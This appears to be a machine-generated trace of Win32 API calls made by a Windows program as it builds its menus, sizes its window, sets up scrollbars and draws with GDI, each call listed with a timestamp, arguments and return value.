GetVersion () returned 0x23f00206 [0093.468] InsertMenuItemA (hmenu=0x60357, item=0xffffffff, fByPosition=1, lpmi=0x19ef6b) returned 1 [0093.468] GetVersion () returned 0x23f00206 [0093.468] InsertMenuItemA (hmenu=0x60357, item=0xffffffff, fByPosition=1, lpmi=0x19ef6b) returned 1 [0093.468] GetVersion () returned 0x23f00206 [0093.468] InsertMenuItemA (hmenu=0x60357, item=0xffffffff, fByPosition=1, lpmi=0x19ef6b) returned 1 [0093.468] GetVersion () returned 0x23f00206 [0093.468] InsertMenuItemA (hmenu=0x320383, item=0xffffffff, fByPosition=1, lpmi=0x19f03f) returned 1 [0093.469] CreateMenu () returned 0x902a3 [0093.469] GetVersion () returned 0x23f00206 [0093.469] InsertMenuItemA (hmenu=0x902a3, item=0xffffffff, fByPosition=1, lpmi=0x19ef6b) returned 1 [0093.469] GetVersion () returned 0x23f00206 [0093.469] InsertMenuItemA (hmenu=0x902a3, item=0xffffffff, fByPosition=1, lpmi=0x19ef6b) returned 1 [0093.469] GetVersion () returned 0x23f00206 [0093.469] InsertMenuItemA (hmenu=0x902a3, item=0xffffffff, fByPosition=1, lpmi=0x19ef6b) returned 1 [0093.469] GetVersion () returned 0x23f00206 [0093.469] InsertMenuItemA (hmenu=0x320383, item=0xffffffff, fByPosition=1, lpmi=0x19f03f) returned 1 [0093.469] GetVersion () returned 0x23f00206 [0093.469] InsertMenuItemA (hmenu=0x320383, item=0xffffffff, fByPosition=1, lpmi=0x19f03f) returned 1 [0093.469] GetMenu (hWnd=0x402fa) returned 0x0 [0093.469] SetMenu (hWnd=0x402fa, hMenu=0x320383) returned 1 [0093.471] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x46, wParam=0x0, lParam=0x19f0b4) returned 0x0 [0093.471] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x83, wParam=0x1, lParam=0x19f08c) returned 0x0 [0093.471] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19ea44) returned 0x1 [0093.474] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x94, wParam=0x0, lParam=0x19e9f4) returned 0x0 [0093.509] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x94, wParam=0x0, lParam=0x19e9f4) returned 0x0 [0093.510] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x94, wParam=0x0, lParam=0x19e9f4) returned 0x0 [0093.510] InflateRect (in: lprc=0x19f08c, dx=0, dy=0 | out: lprc=0x19f08c) returned 1 [0093.525] IsIconic (hWnd=0x402fa) returned 0 [0093.525] GetWindowRect (in: hWnd=0x402fa, lpRect=0x19ed00 | out: lpRect=0x19ed00) returned 1 [0093.525] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.525] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x47, wParam=0x0, lParam=0x19f0b4) returned 0x0 [0093.526] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x3, wParam=0x0, lParam=0xb000de) returned 0x0 [0093.526] IsIconic (hWnd=0x402fa) returned 0 [0093.526] GetWindowRect (in: hWnd=0x402fa, lpRect=0x19e744 | out: lpRect=0x19e744) returned 1 [0093.526] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.526] IsIconic (hWnd=0x402fa) returned 0 [0093.526] GetWindowRect (in: hWnd=0x402fa, lpRect=0x19e724 | out: lpRect=0x19e724) returned 1 [0093.526] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.526] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x5, wParam=0x0, lParam=0xbf013a) returned 0x0 [0093.526] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19e750, fWinIni=0x0 | out: pvParam=0x19e750) returned 1 [0093.527] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.527] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.527] IsIconic (hWnd=0x402fa) returned 0 [0093.527] GetClientRect (in: hWnd=0x402fa, lpRect=0x19e738 | out: lpRect=0x19e738) returned 1 [0093.527] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.527] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.527] IsIconic (hWnd=0x402fa) returned 0 [0093.527] GetClientRect (in: hWnd=0x402fa, lpRect=0x19e738 | out: lpRect=0x19e738) returned 1 [0093.527] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.527] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.527] IsIconic (hWnd=0x402fa) returned 0 [0093.527] GetClientRect (in: hWnd=0x402fa, lpRect=0x19e708 | out: lpRect=0x19e708) returned 1 [0093.528] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.528] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.528] IsIconic (hWnd=0x402fa) returned 0 [0093.528] GetClientRect (in: hWnd=0x402fa, lpRect=0x19e708 | out: lpRect=0x19e708) returned 1 [0093.529] FlatSB_SetScrollProp (param_1=0x402fa, index=0x100, newValue=0x0, param_4=1) returned 0 [0093.530] GetSysColor (nIndex=20) returned 0xffffff [0093.530] FlatSB_SetScrollProp (param_1=0x402fa, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0093.530] FlatSB_SetScrollInfo (param_1=0x402fa, code=1, psi=0x19e746, fRedraw=1) returned 0 [0093.591] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19db44) returned 0x1 [0093.592] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0093.592] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0093.593] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0093.604] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19dc4c) returned 0x1 [0093.607] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.607] IsIconic (hWnd=0x402fa) returned 0 [0093.607] GetClientRect (in: hWnd=0x402fa, lpRect=0x19e708 | out: lpRect=0x19e708) returned 1 [0093.607] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.607] IsIconic (hWnd=0x402fa) returned 0 [0093.607] GetClientRect (in: hWnd=0x402fa, lpRect=0x19e708 | out: lpRect=0x19e708) returned 1 [0093.607] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.607] IsIconic (hWnd=0x402fa) returned 0 [0093.607] GetClientRect (in: hWnd=0x402fa, lpRect=0x19e708 | out: lpRect=0x19e708) returned 1 [0093.607] FlatSB_SetScrollProp (param_1=0x402fa, index=0x200, newValue=0x0, param_4=1) returned 0 [0093.607] GetSysColor (nIndex=20) returned 0xffffff [0093.607] FlatSB_SetScrollProp (param_1=0x402fa, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0093.607] FlatSB_SetScrollInfo (param_1=0x402fa, code=0, psi=0x19e746, fRedraw=1) returned 0 [0093.613] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19dc4c) returned 0x1 [0093.614] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.615] IsIconic (hWnd=0x402fa) returned 0 [0093.615] GetClientRect (in: hWnd=0x402fa, lpRect=0x19e708 | out: lpRect=0x19e708) returned 1 [0093.616] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19e81c) returned 0x1 [0093.617] GetMenuItemCount (hMenu=0x320383) returned 3 [0093.617] GetMenuStringA (in: hMenu=0x320383, uIDItem=0x0, lpString=0x19eee8, cchMax=507, flags=0x400 | out: lpString=" ???? ") returned 8 [0093.617] GetMenuState (hMenu=0x320383, uId=0x0, uFlags=0x400) returned 0x710 [0093.617] GetMenuStringA (in: hMenu=0x320383, uIDItem=0x1, lpString=0x19eef1, cchMax=498, flags=0x400 | out: lpString=" ?????? ") returned 8 [0093.617] GetMenuState (hMenu=0x320383, uId=0x1, uFlags=0x400) returned 0x310 [0093.617] GetMenuStringA (in: hMenu=0x320383, uIDItem=0x2, lpString=0x19eefa, cchMax=489, flags=0x400 | out: lpString="? ?????????") returned 11 [0093.617] GetMenuState (hMenu=0x320383, uId=0x2, uFlags=0x400) returned 0x0 [0093.617] GetSystemMenu (hWnd=0x402fa, bRevert=0) returned 0xe036f [0093.618] EnableMenuItem (hMenu=0xe036f, uIDEnableItem=0xf030, uEnable=0x1) returned 0 [0093.619] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x83, wParam=0x0, lParam=0x19f494) returned 0x0 [0093.619] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19ee4c) returned 0x1 [0093.623] InflateRect (in: lprc=0x19f494, dx=0, dy=0 | out: lprc=0x19f494) returned 1 [0093.623] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x1, wParam=0x0, lParam=0x19f4a8) returned 0x0 [0093.625] GetWindowLongA (hWnd=0x402fa, nIndex=-20) returned 65792 [0093.625] SetWindowLongA (hWnd=0x402fa, nIndex=-20, dwNewLong=65792) returned 65792 [0093.625] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x7c, wParam=0xffffffec, lParam=0x19f904) returned 0x0 [0093.625] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x7d, wParam=0xffffffec, lParam=0x19f904) returned 0x0 [0093.626] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19ed5c) returned 0x1 [0093.627] RedrawWindow (hWnd=0x402fa, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x485) returned 1 [0093.627] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.627] IsIconic (hWnd=0x402fa) returned 0 [0093.627] GetWindowRect (in: hWnd=0x402fa, lpRect=0x19f9fc | out: lpRect=0x19f9fc) returned 1 [0093.627] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.628] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x30, wParam=0x280a099c, lParam=0x1) returned 0x0 [0093.628] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.628] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.628] IsIconic (hWnd=0x402fa) returned 0 [0093.628] GetClientRect (in: hWnd=0x402fa, lpRect=0x19fad4 | out: lpRect=0x19fad4) returned 1 [0093.628] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.628] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.628] IsIconic (hWnd=0x402fa) returned 0 [0093.628] GetClientRect (in: hWnd=0x402fa, lpRect=0x19fad4 | out: lpRect=0x19fad4) returned 1 [0093.628] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.628] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.628] IsIconic (hWnd=0x402fa) returned 0 [0093.628] GetClientRect (in: hWnd=0x402fa, lpRect=0x19faa4 | out: lpRect=0x19faa4) returned 1 [0093.628] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.628] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.628] IsIconic (hWnd=0x402fa) returned 0 [0093.628] GetClientRect (in: hWnd=0x402fa, lpRect=0x19faa4 | out: lpRect=0x19faa4) returned 1 [0093.628] FlatSB_SetScrollProp (param_1=0x402fa, index=0x100, newValue=0x0, param_4=0) returned 0 [0093.629] GetSysColor (nIndex=20) returned 0xffffff [0093.629] FlatSB_SetScrollProp (param_1=0x402fa, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0093.629] FlatSB_SetScrollInfo (param_1=0x402fa, code=1, psi=0x19fae2, fRedraw=1) returned 0 [0093.631] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19eedc) returned 0x1 [0093.633] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19efe4) returned 0x1 [0093.634] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.634] IsIconic (hWnd=0x402fa) returned 0 [0093.634] GetClientRect (in: hWnd=0x402fa, lpRect=0x19faa4 | out: lpRect=0x19faa4) returned 1 [0093.634] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.634] IsIconic (hWnd=0x402fa) returned 0 [0093.634] GetClientRect (in: hWnd=0x402fa, lpRect=0x19faa4 | out: lpRect=0x19faa4) returned 1 [0093.634] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.634] IsIconic (hWnd=0x402fa) returned 0 [0093.634] GetClientRect (in: hWnd=0x402fa, lpRect=0x19faa4 | out: lpRect=0x19faa4) returned 1 [0093.634] FlatSB_SetScrollProp (param_1=0x402fa, index=0x200, newValue=0x0, param_4=0) returned 0 [0093.634] GetSysColor (nIndex=20) returned 0xffffff [0093.634] FlatSB_SetScrollProp (param_1=0x402fa, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0093.635] FlatSB_SetScrollInfo (param_1=0x402fa, code=0, psi=0x19fae2, fRedraw=1) returned 0 [0093.636] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19efe4) returned 0x1 [0093.638] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.638] IsIconic (hWnd=0x402fa) returned 0 [0093.638] GetClientRect (in: hWnd=0x402fa, lpRect=0x19faa4 | out: lpRect=0x19faa4) returned 1 [0093.638] SendMessageA (hWnd=0x402fa, Msg=0x80, wParam=0x1, lParam=0x70105) returned 0x0 [0093.639] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x80, wParam=0x1, lParam=0x70105) returned 0x0 [0093.642] SetPropA (hWnd=0x402fa, lpString=0xc0f1, hData=0x2211fc8) returned 1 [0093.642] SetPropA (hWnd=0x402fa, lpString=0xc0f2, hData=0x2211fc8) returned 1 [0093.642] GetDC (hWnd=0x402fa) returned 0x40106cc [0093.642] MoveToEx (in: hdc=0x40106cc, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.642] SelectObject (hdc=0x40106cc, h=0x280a099c) returned 0x18a0048 [0093.642] GetSysColor (nIndex=8) returned 0x0 [0093.642] SetTextColor (hdc=0x40106cc, color=0x0) returned 0x0 [0093.642] GetTextExtentPoint32A (in: hdc=0x40106cc, lpString="0", c=1, psizl=0x19fba8 | out: psizl=0x19fba8) returned 1 [0093.644] IsIconic (hWnd=0x402fa) returned 0 [0093.644] GetClientRect (in: hWnd=0x402fa, lpRect=0x19fb98 | out: lpRect=0x19fb98) returned 1 [0093.644] IsIconic (hWnd=0x402fa) returned 0 [0093.644] GetClientRect (in: hWnd=0x402fa, lpRect=0x19fb90 | out: lpRect=0x19fb90) returned 1 [0093.644] IsIconic (hWnd=0x402fa) returned 0 [0093.644] SetWindowPos (hWnd=0x402fa, hWndInsertAfter=0x0, X=219, Y=130, cx=663, cy=240, uFlags=0x14) returned 1 [0093.644] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x46, wParam=0x0, lParam=0x19fae4) returned 0x0 [0093.644] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x24, wParam=0x0, lParam=0x19f4dc) returned 0x0 [0093.644] SelectObject (hdc=0x40106cc, h=0x1b00017) returned 0x1b00017 [0093.645] SelectObject (hdc=0x40106cc, h=0x1900015) returned 0x1900010 [0093.645] SelectObject (hdc=0x40106cc, h=0x18a0048) returned 0x280a099c [0093.645] GetCurrentPositionEx (in: hdc=0x40106cc, lppt=0x19f2bc | out: lppt=0x19f2bc) returned 1 [0093.645] ReleaseDC (hWnd=0x402fa, hDC=0x40106cc) returned 1 [0093.645] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x83, wParam=0x1, lParam=0x19fabc) returned 0x0 [0093.646] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19f474) returned 0x1 [0093.646] InflateRect (in: lprc=0x19fabc, dx=0, dy=0 | out: lprc=0x19fabc) returned 1 [0093.648] IsWindowVisible (hWnd=0x402fa) returned 0 [0093.648] IsIconic (hWnd=0x402fa) returned 0 [0093.648] GetWindowRect (in: hWnd=0x402fa, lpRect=0x19f730 | out: lpRect=0x19f730) returned 1 [0093.648] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.648] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x47, wParam=0x0, lParam=0x19fae4) returned 0x0 [0093.648] IsIconic (hWnd=0x402fa) returned 0 [0093.648] GetWindowRect (in: hWnd=0x402fa, lpRect=0x19f154 | out: lpRect=0x19f154) returned 1 [0093.648] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.648] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x5, wParam=0x0, lParam=0xbf0291) returned 0x0 [0093.648] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19f180, fWinIni=0x0 | out: pvParam=0x19f180) returned 1 [0093.648] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.649] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.649] IsIconic (hWnd=0x402fa) returned 0 [0093.649] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f168 | out: lpRect=0x19f168) returned 1 [0093.649] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.649] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.649] IsIconic (hWnd=0x402fa) returned 0 [0093.649] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f168 | out: lpRect=0x19f168) returned 1 [0093.649] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.649] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.649] IsIconic (hWnd=0x402fa) returned 0 [0093.649] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.649] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.649] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.649] IsIconic (hWnd=0x402fa) returned 0 [0093.649] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.649] FlatSB_SetScrollProp (param_1=0x402fa, index=0x100, newValue=0x0, param_4=0) returned 0 [0093.649] GetSysColor (nIndex=20) returned 0xffffff [0093.649] FlatSB_SetScrollProp (param_1=0x402fa, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0093.649] FlatSB_SetScrollInfo (param_1=0x402fa, code=1, psi=0x19f176, fRedraw=1) returned 0 [0093.651] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19e574) returned 0x1 [0093.652] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x12023d [0093.666] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19e67c) returned 0x1 [0093.667] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.667] IsIconic (hWnd=0x402fa) returned 0 [0093.667] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.667] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.667] IsIconic (hWnd=0x402fa) returned 0 [0093.667] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.667] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.667] IsIconic (hWnd=0x402fa) returned 0 [0093.667] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.667] FlatSB_SetScrollProp (param_1=0x402fa, index=0x200, newValue=0x0, param_4=0) returned 0 [0093.667] GetSysColor (nIndex=20) returned 0xffffff [0093.667] FlatSB_SetScrollProp (param_1=0x402fa, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0093.667] FlatSB_SetScrollInfo (param_1=0x402fa, code=0, psi=0x19f176, fRedraw=1) returned 0 [0093.701] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19e67c) returned 0x1 [0093.702] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.702] IsIconic (hWnd=0x402fa) returned 0 [0093.702] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.703] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19f24c) returned 0x1 [0093.705] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fb10, fWinIni=0x0 | out: pvParam=0x19fb10) returned 1 [0093.705] IsIconic (hWnd=0x402fa) returned 0 [0093.705] GetClientRect (in: hWnd=0x402fa, lpRect=0x19fb98 | out: lpRect=0x19fb98) returned 1 [0093.705] IsIconic (hWnd=0x402fa) returned 0 [0093.705] GetClientRect (in: hWnd=0x402fa, lpRect=0x19fb90 | out: lpRect=0x19fb90) returned 1 [0093.705] IsIconic (hWnd=0x402fa) returned 0 [0093.705] SetWindowPos (hWnd=0x402fa, hWndInsertAfter=0x0, X=219, Y=130, cx=663, cy=671, uFlags=0x14) returned 1 [0093.705] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x46, wParam=0x0, lParam=0x19fae4) returned 0x0 [0093.705] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x24, wParam=0x0, lParam=0x19f4dc) returned 0x0 [0093.705] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x83, wParam=0x1, lParam=0x19fabc) returned 0x0 [0093.706] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19f474) returned 0x1 [0093.706] InflateRect (in: lprc=0x19fabc, dx=0, dy=0 | out: lprc=0x19fabc) returned 1 [0093.708] IsWindowVisible (hWnd=0x402fa) returned 0 [0093.708] IsIconic (hWnd=0x402fa) returned 0 [0093.708] GetWindowRect (in: hWnd=0x402fa, lpRect=0x19f730 | out: lpRect=0x19f730) returned 1 [0093.708] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.708] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x47, wParam=0x0, lParam=0x19fae4) returned 0x0 [0093.708] IsIconic (hWnd=0x402fa) returned 0 [0093.708] GetWindowRect (in: hWnd=0x402fa, lpRect=0x19f154 | out: lpRect=0x19f154) returned 1 [0093.708] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.708] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x5, wParam=0x0, lParam=0x26e0291) returned 0x0 [0093.708] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19f180, fWinIni=0x0 | out: pvParam=0x19f180) returned 1 [0093.708] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.708] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.708] IsIconic (hWnd=0x402fa) returned 0 [0093.708] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f168 | out: lpRect=0x19f168) returned 1 [0093.708] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.708] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.708] IsIconic (hWnd=0x402fa) returned 0 [0093.709] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f168 | out: lpRect=0x19f168) returned 1 [0093.709] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.709] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.709] IsIconic (hWnd=0x402fa) returned 0 [0093.709] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.709] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.709] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.709] IsIconic (hWnd=0x402fa) returned 0 [0093.709] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.709] FlatSB_SetScrollProp (param_1=0x402fa, index=0x100, newValue=0x0, param_4=0) returned 0 [0093.709] GetSysColor (nIndex=20) returned 0xffffff [0093.709] FlatSB_SetScrollProp (param_1=0x402fa, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0093.709] FlatSB_SetScrollInfo (param_1=0x402fa, code=1, psi=0x19f176, fRedraw=1) returned 0 [0093.711] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19e574) returned 0x1 [0093.713] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19e67c) returned 0x1 [0093.714] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.714] IsIconic (hWnd=0x402fa) returned 0 [0093.714] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.714] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.714] IsIconic (hWnd=0x402fa) returned 0 [0093.714] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.714] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.714] IsIconic (hWnd=0x402fa) returned 0 [0093.714] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.714] FlatSB_SetScrollProp (param_1=0x402fa, index=0x200, newValue=0x0, param_4=0) returned 0 [0093.714] GetSysColor (nIndex=20) returned 0xffffff [0093.714] FlatSB_SetScrollProp (param_1=0x402fa, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0093.715] FlatSB_SetScrollInfo (param_1=0x402fa, code=0, psi=0x19f176, fRedraw=1) returned 0 [0093.718] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19e67c) returned 0x1 [0093.719] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.719] IsIconic (hWnd=0x402fa) returned 0 [0093.719] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f138 | out: lpRect=0x19f138) returned 1 [0093.720] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x93, wParam=0x0, lParam=0x19f24c) returned 0x1 [0093.721] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fb10, fWinIni=0x0 | out: pvParam=0x19fb10) returned 1 [0093.721] IsIconic (hWnd=0x402fa) returned 0 [0093.721] GetClientRect (in: hWnd=0x402fa, lpRect=0x19fba8 | out: lpRect=0x19fba8) returned 1 [0093.721] GetCurrentThreadId () returned 0x13b0 [0093.721] GetCurrentThreadId () returned 0x13b0 [0093.721] GetCurrentThreadId () returned 0x13b0 [0093.721] GetCurrentThreadId () returned 0x13b0 [0093.721] GetCurrentThreadId () returned 0x13b0 [0093.722] GetCurrentThreadId () returned 0x13b0 [0093.722] GetCurrentThreadId () returned 0x13b0 [0093.722] FreeResource (hResData=0x4f98d8) returned 0 [0093.722] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.722] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.722] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.722] GetSysColor (nIndex=8) returned 0x0 [0093.722] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.722] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.722] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.722] UnrealizeObject (h=0x2d10099f) returned 1 [0093.722] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.722] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.722] 